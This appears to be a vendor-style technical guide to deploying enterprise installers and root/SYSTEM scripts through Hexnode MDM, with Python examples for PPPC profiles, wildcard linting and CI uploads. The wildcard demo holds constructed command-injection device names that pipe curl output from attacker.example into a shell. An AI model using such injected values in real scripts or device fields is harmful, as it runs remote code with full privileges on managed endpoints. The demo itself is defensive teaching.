
Native Installer Deployment: Managing Enterprise Apps Without Wrappers

In enterprise environments managing large device fleets, public app stores are insufficient for deploying bespoke binaries, legacy applications, and complex configuration scripts.

This document defines the technical framework for Enterprise App Distribution and Advanced Scripting within Hexnode. It outlines how administrative teams can use Hexnode’s native payload delivery, execution arguments, and policy engine to manage the software lifecycle with precise control and validation, and which checks a practitioner should add before handing root- or SYSTEM-level code to a fleet.

Logical Architecture: The Native Distribution Plane

Hexnode does not rely on proprietary app wrappers. Instead, it natively supports standard installer packages and executes them using the device’s native OS components (e.g., Windows Installer, macOS Installer), coordinated through the UEM console.

  • The Enterprise App Repository: A centralized, cloud-hosted storage vault within the Hexnode tenant. Administrators upload raw installer files (MSI, EXE, PKG, DMG, APK, IPA) directly into this repository.
  • The Configuration Layer: For complex apps (like Win32 EXEs), Hexnode provides a UI to define the “Contract of Execution”—specifying silent install arguments and uninstall strings.
  • The Delivery Engine: Hexnode dispatches the download URL and execution profile to the endpoint via standard MDM channels (APNs for Apple, WNS for Windows, FCM for Android).
  • The Feedback Loop: The native Hexnode Agent executes the payload and reports the success or failure state back to the Manage > Action History console.

Custom App Distribution: OS Specifics

To make deployments deterministic, Hexnode exposes the installer-specific configuration that each desktop and mobile OS needs rather than hiding it behind a wrapper.

1. Windows App Deployment (MSI & Win32 EXE)

Hexnode treats Windows app deployments as configurable payloads rather than static files.

  • Execution Arguments: Administrators explicitly define silent installation parameters in the app configuration UI before deployment. The switches belong to the installer technology, not to Hexnode: Windows Installer packages take msiexec options such as /quiet /norestart (or /qn), NSIS-built EXEs take /S, and InstallShield-built EXEs take /s /v"/qn", where everything after /v is passed through to the embedded MSI. Treat exit code 3010 (ERROR_SUCCESS_REBOOT_REQUIRED) as success with a pending reboot rather than as a failure, or the action history will show false failures.
  • Uninstall Commands: Custom uninstallation strings (e.g., msiexec /x {ProductCode-GUID} /qn) are defined alongside the install string so the same app can be removed cleanly via UEM policies or remote actions. The product code of an installed MSI is recorded under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall (and the WOW6432Node branch for 32-bit installers); confirm it on a pilot machine before relying on the uninstall string.

2. macOS App Deployment (PKG, DMG, & .app)

  • Native Execution: Hexnode deploys PKG and DMG payloads through the macOS installer machinery; no repackaging is involved.
  • PPPC Integration: Installation itself is silent; the prompts users see come from TCC (Transparency, Consent and Control) the first time the installed app touches a protected resource. To avoid them, pair the app deployment with a Privacy Preferences Policy Control (PPPC) profile delivered before the app first runs. The profile identifies the app by bundle ID plus its code-signing requirement (the designated requirement printed by codesign -d -r -), so that a different binary reusing the bundle ID does not inherit the grant, and it can pre-approve “Full Disk Access” (SystemPolicyAllFiles), “Accessibility” and similar services. Camera, Microphone and Screen Recording cannot be pre-approved by MDM at all: a profile may only deny them or, for Screen Recording, let a standard user approve the prompt themselves. macOS honours PPPC payloads only when they arrive through MDM as a device profile; the same profile installed by hand is ignored.
  • Gatekeeper Compliance: Sign PKGs with a Developer ID Installer certificate; the MDM install command rejects unsigned packages. Notarize them as well so that the identical package also passes Gatekeeper if a user ever opens it by hand or obtains it outside the MDM channel.
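The PPPC profile described above is an XML plist with a fixed structure, and the two places people get wrong are the code requirement and the services macOS refuses to let MDM allow. The generator below is an added example, not Hexnode’s own code: it builds a com.apple.TCC.configuration-profile-policy profile, binds every grant to a code requirement, and rejects requests to “allow” Camera, Microphone or Screen Recording. The bundle ID, team ID and designated requirement in the demo are constructed placeholders; take the real requirement from codesign -d -r - /Applications/YourApp.app on a machine that has the signed app, and upload the resulting .mobileconfig as a custom configuration profile.

```python
#!/usr/bin/env python3
"""Build a PPPC (com.apple.TCC.configuration-profile-policy) profile for an
app that Hexnode installs silently, so the first access to a protected
resource does not raise a TCC prompt.

Added example, not Hexnode code. Bundle ID, team ID and code requirement
in the demo are constructed placeholders."""
import plistlib
import uuid

# Services MDM can never pre-approve: only "deny" is valid for these.
DENY_ONLY = {"Camera", "Microphone"}
# Services MDM cannot allow, but may hand the decision to a standard user.
STANDARD_USER_ONLY = {"ScreenCapture", "ListenEvent"}

# Policy keywords accepted by this helper, mapped to the payload keys.
# "Allowed" is the legacy boolean (macOS 10.14/10.15); "Authorization" is
# the macOS 11+ key and wins when both are present.
_AUTH = {
    "allow": {"Allowed": True, "Authorization": "Allow"},
    "deny": {"Allowed": False, "Authorization": "Deny"},
    "standard-user": {"Authorization": "AllowStandardUserToSetSystemService"},
}


def _service_entry(bundle_id, code_requirement, service, policy):
    if policy not in _AUTH:
        raise ValueError(f"unknown policy {policy!r}")
    if service in DENY_ONLY and policy != "deny":
        raise ValueError(f"{service} cannot be pre-approved by MDM; only 'deny' is valid")
    if service in STANDARD_USER_ONLY and policy == "allow":
        raise ValueError(f"{service} cannot be allowed by MDM; use 'standard-user' or 'deny'")
    entry = {
        "Identifier": bundle_id,
        "IdentifierType": "bundleID",
        # Binding the grant to the designated requirement stops an unrelated,
        # differently signed binary that reuses the bundle ID from inheriting it.
        "CodeRequirement": code_requirement,
        "StaticCode": False,
        "Comment": f"{service}: {policy} for {bundle_id}",
    }
    entry.update(_AUTH[policy])
    return entry


def build_pppc_profile(display_name, org_prefix, bundle_id, code_requirement, services):
    """services maps a TCC service name to 'allow', 'deny' or 'standard-user'.
    Returns the profile as XML plist bytes ready to save as .mobileconfig."""
    payload_id = f"{org_prefix}.pppc.{bundle_id}"
    tcc_payload = {
        "PayloadType": "com.apple.TCC.configuration-profile-policy",
        "PayloadIdentifier": payload_id + ".tcc",
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadVersion": 1,
        "PayloadDisplayName": display_name,
        "Services": {
            svc: [_service_entry(bundle_id, code_requirement, svc, pol)]
            for svc, pol in services.items()
        },
    }
    profile = {
        "PayloadType": "Configuration",
        "PayloadScope": "System",  # PPPC only takes effect as an MDM-delivered device profile
        "PayloadIdentifier": payload_id,
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadVersion": 1,
        "PayloadDisplayName": display_name,
        "PayloadDescription": f"Pre-approves TCC services for {bundle_id}",
        "PayloadContent": [tcc_payload],
    }
    return plistlib.dumps(profile)


def load_profile(data: bytes) -> dict:
    """Parse profile bytes back into a dict, for pre-upload checks."""
    return plistlib.loads(data)


if __name__ == "__main__":
    # Constructed placeholder; obtain the real one with: codesign -d -r - /Applications/YourApp.app
    EXAMPLE_DR = ('identifier "com.example.backupagent" and anchor apple generic '
                  'and certificate leaf[subject.OU] = "ABCDE12345"')
    data = build_pppc_profile(
        "Backup Agent PPPC", "com.example", "com.example.backupagent", EXAMPLE_DR,
        {"SystemPolicyAllFiles": "allow", "Accessibility": "allow", "Camera": "deny"})
    with open("backupagent-pppc.mobileconfig", "wb") as f:
        f.write(data)
```

Sign the generated profile with an organisation certificate if your deployment process requires signed profiles; otherwise upload it unsigned and let Hexnode deliver it as a device-scoped custom configuration profile ahead of the app.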

3. Linux & Mobile (DEB, RPM, APK, IPA)

  • Linux: Hexnode supports deploying standard .deb and .rpm packages via the “Required Apps” policy, using the device’s native package manager for silent background installation. Confirm on a pilot device whether dependencies are resolved from the configured repositories or must ship inside the package.
  • Mobile: iOS and Android enterprise binaries are deployed directly to the device. An IPA must be signed with an in-house (Apple Developer Enterprise Program) distribution certificate whose provisioning profile is also pushed to the device, and iOS installs without a user prompt only on supervised devices. Android supports silent installation on fully managed (Device Owner) endpoints; on other management modes the user confirms the install.

Advanced Scripting Orchestration

For tasks that cannot be accomplished via standard app deployment, Hexnode can push arbitrary scripts to endpoints through its Execute Custom Script capability. Because these scripts typically run as root or SYSTEM, treat them as code deployments: version them, review them, and restrict who can push them.

1. Supported Scripting Languages

Hexnode natively supports executing scripts as either immediate Remote Actions or via automated, schedule-driven Policies. The interpreter is selected by the file extension and, on macOS and Linux, by the script’s shebang line, so include one:

  • Windows: PowerShell (.ps1), Batch (.bat), Command (.cmd)
  • macOS: Shell Scripts (.sh), Python (.py, only if an interpreter is present: macOS 12.3 and later no longer ship Python, so deploy one first or write the task in zsh/bash)
  • Linux: Bash/Shell (.sh)

2. Execution Context & Native Wildcards

Administrators can dictate whether a script runs in the System Context (root on macOS and Linux, LocalSystem on Windows) or the User Context (the logged-in user’s privileges). Hexnode also supports injecting dynamic wildcards into scripts to make them context-aware. The portal replaces each placeholder with the device’s actual value before the script reaches the endpoint, so the value becomes part of the script text. Device names and user attributes can be set by enrolling users or synced from a directory, so quote every placeholder where it is used, prefer firmware-derived identifiers such as the serial number for anything security-relevant, and never concatenate a free-text wildcard into a command line:

  • %devicename%: Natively injects the device’s assigned name.
  • %imei% / %serialnumber%: Injects hardware identifiers (useful for asset tagging scripts).
  • %user% / %email%: Injects the currently assigned user’s details.
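The following is an added example, not Hexnode code, showing why unquoted wildcards matter. It models the portal’s substitution as plain text replacement (an assumption about the mechanism; the page only states that values are injected), tokenises the resulting line the way a POSIX shell would, and includes a small lint that flags wildcards used outside quotes so it can run over a script repository before anything is uploaded. The device names are constructed samples; the wildcard names are Hexnode’s.

```python
#!/usr/bin/env python3
"""Why Hexnode wildcards need the same care as any other untrusted input.

Added example, not Hexnode code. Assumption: the portal replaces each
%wildcard% token textually before the script reaches the device, so the
contents of a device name or user field become part of the script source.
All device names used here are constructed samples."""
import re
import shlex

WILDCARDS = ("%devicename%", "%imei%", "%serialnumber%", "%user%", "%email%")
SEPARATORS = ";|&"  # shell command separators we make visible


def substitute(template: str, values: dict) -> str:
    """Model of the portal's textual wildcard replacement (assumption)."""
    for token, value in values.items():
        template = template.replace(token, value)
    return template


def shell_commands(line: str) -> list:
    """Tokenise one line as a POSIX shell would (quotes honoured) and split it
    into separate commands at ; | & so that an injection shows up as extra
    commands rather than extra arguments."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=SEPARATORS)
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok and all(c in SEPARATORS for c in tok):
            if current:
                commands.append(current)
                current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def unquoted_wildcards(script: str) -> list:
    """Lint: return (line_no, wildcard) for every wildcard that sits outside a
    single- or double-quoted string. Backslash escapes are not modelled."""
    findings = []
    pattern = re.compile("|".join(re.escape(w) for w in WILDCARDS))
    for no, line in enumerate(script.splitlines(), 1):
        for m in pattern.finditer(line):
            quote = None
            for ch in line[:m.start()]:
                if quote is None and ch in "\"'":
                    quote = ch
                elif ch == quote:
                    quote = None
            if quote is None:
                findings.append((no, m.group(0)))
    return findings


# Hardware identifiers come from firmware and cannot carry shell syntax;
# free-text fields (device name, user, email) can. A script that must use a
# free-text value should check it against an allowlist before using it.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._@-]{0,63}$")


def is_safe_value(value: str) -> bool:
    return bool(SAFE_VALUE.match(value))


if __name__ == "__main__":
    unquoted = "hostnamectl set-hostname %devicename%"
    quoted = 'hostnamectl set-hostname "%devicename%"'
    hostile = "Lab-PC; curl http://attacker.example/x | sh"  # constructed
    for name in ("Lab-PC-017", hostile):
        n = len(shell_commands(substitute(unquoted, {"%devicename%": name})))
        print(f"unquoted, name={name!r}: {n} command(s)")
    print("quoted, hostile name:",
          len(shell_commands(substitute(quoted, {"%devicename%": hostile}))), "command(s)")
    # A value containing a double quote breaks out of the quoted form too.
    breakout = 'Lab"; curl http://attacker.example/x | sh; echo "'  # constructed
    print("quoted, name with quote:",
          len(shell_commands(substitute(quoted, {"%devicename%": breakout}))), "command(s)")
    print("lint:", unquoted_wildcards(unquoted + "\n" + quoted))
```

Quoting turns a hostile value into a single argument, but a value that itself contains the quote character still breaks out, which is why the lint is only the first line of defence: restrict who can edit device names and user fields, and reserve free-text wildcards for logging rather than for anything that is executed. The same applies to PowerShell, where a double-quoted string expands $(...) subexpressions; place a wildcard inside single quotes there.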

3. API-Driven Automation (External CI/CD)

Enterprise development teams can use the Hexnode Enterprise REST API to build custom CI/CD pipelines. The API is authenticated with a tenant API key sent in the Authorization header; keep that key in the CI runner’s secret store rather than in the repository, issue it to an API-only technician account with the minimum role, and rotate it on a schedule.

  • An external runner (e.g., GitHub Actions, Jenkins) can be configured to make a POST request to Hexnode’s API to upload a new version of an Enterprise App or trigger a script execution upon a code merge. Gate that step on the build’s own integrity checks (signature verification and a recorded SHA-256 of the artifact) so that the pipeline cannot be used to push a tampered installer to the fleet.
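A CI upload step of that shape, as an added example that is not Hexnode’s tooling: it pins the artifact to the SHA-256 recorded by the build job, reads the API key from the runner’s environment, and builds a multipart POST with the standard library only. The base URL pattern https://<portal>.hexnodemdm.com/api/v1/ and the Authorization header carrying the raw API key are how Hexnode’s API is documented; the upload path /apps/enterprise/ and the form field names are placeholders to be replaced from the API reference for your tenant.

```python
#!/usr/bin/env python3
"""CI step that publishes a freshly built installer to the Hexnode Enterprise
App repository through the REST API.

Added example, not Hexnode's own tooling. Assumptions to verify against the
API reference: base URL https://<portal>.hexnodemdm.com/api/v1/, the API key
sent as the Authorization header, and the placeholder upload path
/apps/enterprise/ with placeholder multipart field names."""
import hashlib
import mimetypes
import os
import sys
import urllib.request
import uuid

UPLOAD_PATH = "/apps/enterprise/"  # placeholder endpoint (assumption)


def sha256_of(path: str) -> str:
    """Stream the file so large installers do not have to fit in memory twice."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def multipart_body(fields: dict, file_field: str, filename: str, data: bytes):
    """Encode a multipart/form-data body without third-party dependencies.
    Returns (body_bytes, content_type_header_value)."""
    boundary = uuid.uuid4().hex
    parts = []
    for name, value in fields.items():
        parts += [f"--{boundary}".encode(),
                  f'Content-Disposition: form-data; name="{name}"'.encode(),
                  b"", str(value).encode()]
    ctype = mimetypes.guess_type(filename)[0] or "application/octet-stream"
    parts += [f"--{boundary}".encode(),
              f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"'.encode(),
              f"Content-Type: {ctype}".encode(), b"", data,
              f"--{boundary}--".encode(), b""]
    return b"\r\n".join(parts), f"multipart/form-data; boundary={boundary}"


def build_upload_request(base_url: str, api_key: str, installer_path: str,
                         expected_sha256: str) -> urllib.request.Request:
    """Refuse to upload anything whose digest differs from what the build job
    recorded, so a tampered artifact never reaches the repository."""
    actual = sha256_of(installer_path)
    if actual != expected_sha256.lower():
        raise ValueError(f"installer hash mismatch: {actual} != {expected_sha256}")
    with open(installer_path, "rb") as f:
        data = f.read()
    name = os.path.basename(installer_path)
    body, ctype = multipart_body({"name": name, "sha256": actual}, "file", name, data)
    return urllib.request.Request(
        base_url.rstrip("/") + UPLOAD_PATH, data=body, method="POST",
        headers={"Authorization": api_key, "Content-Type": ctype})


def main():
    base_url = os.environ["HEXNODE_BASE_URL"]   # e.g. https://<portal>.hexnodemdm.com/api/v1
    api_key = os.environ["HEXNODE_API_KEY"]     # injected from the runner's secret store
    installer, expected = sys.argv[1], sys.argv[2]
    req = build_upload_request(base_url, api_key, installer, expected)
    with urllib.request.urlopen(req, timeout=120) as resp:
        print(resp.status, resp.read(300).decode(errors="replace"))


if __name__ == "__main__":
    main()
```

Invoke it as the last job of the pipeline, after the signing job has written the artifact’s digest to the build metadata, for example `python upload.py dist/agent-2.4.1.msi "$(cat dist/agent-2.4.1.msi.sha256)"`. Keeping the hash as a separate pipeline input means a compromised build cache that swaps the binary fails at this step instead of reaching the Enterprise App repository.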

Security, Governance & Auditing

  • Role-Based Access Control (RBAC): Using Hexnode’s Custom Roles, the ability to execute scripts or deploy apps can be restricted to Tier-3 (Admin) personnel only, preventing helpdesk technicians from executing code on endpoints. Because a script pushed in the System Context is equivalent to root or SYSTEM on every targeted device, treat this permission with the same care as domain-admin membership.
  • OS-Level Code Signing: Hexnode relies on OS-level enforcement rather than its own signature checks. Windows policies can enforce SmartScreen and macOS policies enforce Gatekeeper, but both gate user-initiated launches; a payload installed by the MDM agent, and a script run by it, is not stopped by either. The control that actually protects the fleet is therefore verifying signatures and recording hashes before a binary is uploaded, and limiting who can upload.
  • Centralized Auditing: Every script executed and app deployed via the portal is logged. The Action History tracks the success or failure of the payload on the device, while Audit Reports record which administrator initiated the deployment and when. The console records that a script ran, not what it did on the device, so pair it with endpoint logging (Sysmon or the Windows event log, the macOS unified log, auditd) if script activity must be reconstructable.

Implementation Checklist

  1. App Repository Initialization: Verify each binary’s signature (signtool verify /pa on Windows, pkgutil --check-signature on macOS) and record its SHA-256, then upload foundational enterprise binaries (VPN clients, internal tooling) to Apps > Enterprise Apps.
  2. Win32 Configuration: Define silent install strings for all Windows uploads in the Hexnode UI (/quiet /norestart for MSI, /S for NSIS, /s /v"/qn" for InstallShield) and confirm the uninstall string against the product code on a pilot machine.
  3. PPPC Mapping (macOS): Create and deploy Custom Configuration Profiles granting Full Disk Access, bound to each tool’s bundle ID and code requirement, to required macOS administrative tools prior to deploying their respective apps.
  4. Script Validation: Test foundational PowerShell (.ps1) and Shell (.sh) scripts on a small subset of pilot devices to verify execution contexts (System vs. User) and wildcard functionality, and confirm that no wildcard is used unquoted.
  5. RBAC Lockout: Navigate to Admin > Technicians and Roles and verify that Custom Roles for Helpdesk technicians have the “Execute Custom Script” and “Manage Apps” permissions explicitly disabled, and that API keys are issued only to accounts with the narrowest role the pipeline needs.